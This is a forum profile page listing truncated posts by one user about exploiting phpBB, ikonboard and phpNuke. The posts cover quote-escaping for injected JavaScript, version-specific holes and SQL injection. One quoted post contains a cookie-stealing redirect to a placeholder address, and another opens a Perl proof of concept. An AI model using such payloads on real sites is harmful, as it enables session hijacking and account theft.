Waraxe IT Security Portal

chiche · Replies: 3

argentino:
lo que queria era escapar de alguna forma las comillas simples para poder ejecutar codigo javascript en el foro con mi direccion:

document.location= 'XX.XX.XX.XX/algo.php?cookie=' + win ...

chiche · Replies: 3

Hello.
Im trying to escape single quotes in phpbb.
I tried String.fromCharCode() without luck.
I was also thinking in <script src = '...
but it use quotes too.
Any new idea?

chiche · Replies: 5

maybe u are rigth about the version.
i didnt know if u dont use the upgrate script, the programa version dont change.
whatabaout 2.0.11, any vuln has been made public at the moment?

chiche · Replies: 0

I found a proof of concept for ikonboard:

#!/usr/bin/perl -w
use strict;

my $HOST = 'www.example.com';
my $PORT = 80;
my $PATH = '/cgi-bin/ikonboard.cgi';
my $HEAD = qq|"Content-type: text/p ...

chiche · Replies: 5

testing again i can see that your code works for phpbb 2.0.8 but dont work for 2.0.10.
works fine in 2.0.8, nice work, thanx.
if u have any idea about 2.0.10 please let me know, thanx.

chiche · Replies: 5

im testing it but this only work in your example.
do i have to change anithing?

chiche · Replies: 5

hello again forum.
here is my question ...
is there a way to obtain the preffix of an sql table for example to make a proof of concept for example for a phpBB forum.
If the instalation is standard ...

chiche · Replies: 1

Hi again forum.
I learned to program my own cookies so i make work some proff of concept from this page.
Now i am with phpnuke and the sql injections on it.
In several sites i get the following dat ...

chiche · Replies: 1

Hello people, this is my firt post at the forum.
In the last time i have been testing diferents exploits related to sql injection and similar stuff becouse im intresting in the security of web aplica ...